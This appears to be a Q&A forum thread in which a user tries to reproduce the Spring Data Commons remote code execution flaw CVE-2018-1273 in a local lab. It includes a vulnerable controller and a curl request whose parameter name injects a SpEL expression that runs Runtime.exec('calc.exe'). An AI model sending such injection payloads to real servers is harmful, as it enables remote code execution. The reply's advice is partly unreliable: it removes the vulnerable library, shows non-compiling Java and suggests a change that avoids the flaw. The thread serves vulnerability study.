# Spring data code execution simulation

Tags: java, spring, security, spring-boot, spring-data-jpa

I am trying to simulate the spring RCE vulnerability in my local where I am not able to do so.

Code:

```
https://github.com/wearearima/poc-cve-2018-1273
```

Maven I am using is

pom.xml

```
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>eu.arima</groupId>
    <artifactId>poc-cve-2018-1273</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <packaging>jar</packaging>

    <name>poc-cve-2018-1273</name>
    <description>POC CVE 2018 1273</description>

    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>1.4.2.RELEASE</version>
        <relativePath /> <!-- lookup parent from repository -->
    </parent>

    <properties>
        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
        <project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding>
        <java.version>1.8</java.version>
    </properties>

    <dependencies>
        <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-data-jpa</artifactId>
    </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>

        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-test</artifactId>
            <scope>test</scope>
        </dependency>
    </dependencies>

    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>
</project>
```

There is one difference here. Instead of `spring-boot-starter-data-rest`, I am using `spring-boot-starter-data-jpa` as both of them contains the vulnerable library i.e. `spring-data-commons`.

When I call the controller class, it works fine without executing the provided RCE code.

Controller

```
@RestController
public class VulnerableController {

    private static final Logger LOGGER = LoggerFactory.getLogger(VulnerableController.class);

    @PostMapping(path = "/account")
    public void doSomething(Account account) {
        LOGGER.info("Account {} received", account.getName());
    }

    interface Account {
        String getName();
    }

}
```

Calling the API:

```
curl -X POST http://localhost:8080/account -d "name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('calc.exe')]=123"
```

Why it is not executing the code?

Answer (score 1):

**1- You should remove unnecessary dependency** by  excluding ***common*** dependency from any one of the of your dependency 
  Example:-

```
<dependency>
  <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-data-jpa</artifactId>
  <exclusions>
    <exclusion>  <!-- declare the exclusion here -->
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-data-commons</artifactId>
    </exclusion>
  </exclusions> 
</dependency>
```

**2-Make test  to see what's return value from your command :**

```
public static void main(String[] args)
{
 Account.getClass().getRuntime().exec('calc.exe');
}
```

**3-Change your controller code to the following**

```
@RestController
public class VulnerableController {

private static final Logger LOGGER = LoggerFactory.getLogger(VulnerableController.class);

@PostMapping(path = "/account")
public void doSomething(@RequestBody Account account) {
    LOGGER.info("Account {} received", account.getName());
}

interface Account {
    String getName();
}
```

}

**4- Execute the following command from cmd**

```
curl --header "Content-Type: application/json" \
--request POST \
--data '{your account class as json format}' \
http://localhost:8080/account
```

Comment: `spring-data-commons` library only contains the issue, how will it work if I remove it? Also `@RequestMapping Account account` showing as location disallowed.

Comment: ignore first 2 steps , you can execute 3 , 4 steps  , what do you mean by  @RequestMapping Account account showing as location disallowed. ?

it's annotation for convert map json to your  Account Object  , please review spring documentation first .

Comment: Is it supposed to be `@RequestBody`?